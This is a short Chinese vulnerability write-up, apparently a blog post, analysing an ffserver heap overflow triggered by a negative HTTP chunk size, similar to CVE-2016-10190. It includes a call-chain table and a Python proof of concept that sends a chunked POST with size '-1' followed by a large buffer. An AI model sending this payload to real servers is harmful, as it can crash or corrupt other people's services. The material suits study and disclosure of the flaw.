0x1 漏洞分析
漏洞影响ffserver程序,和cve-2016-10190类似,当c->chunk_size负数时,recv溢出。
| http_receive_data | handle_connection | http_server | main |
|---|---|---|---|
| c->chunk_size = strtol(c->buffer, 0, 16); recv(c->fd, c->buffer_ptr, FFMIN(c->chunk_size, c->buffer_end - c->buffer_ptr), 0); |
http_receive_data(c) | handle_connection(c) | http_server() |
0x2 poc
import socket
bind_ip = '127.0.0.1'
bind_port = 9999
headers = """POST /feed1.ffm HTTP/1.1rnHost: 127.0.0.1:9999rnConnection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Pragma: client-id=123456
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
-1rn"""
if __name__ == '__main__':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((bind_ip, bind_port))
s.send(headers)
data = ''
data += "fm"
data += "a"*0x50000
s.send(data)
s.close()
近期评论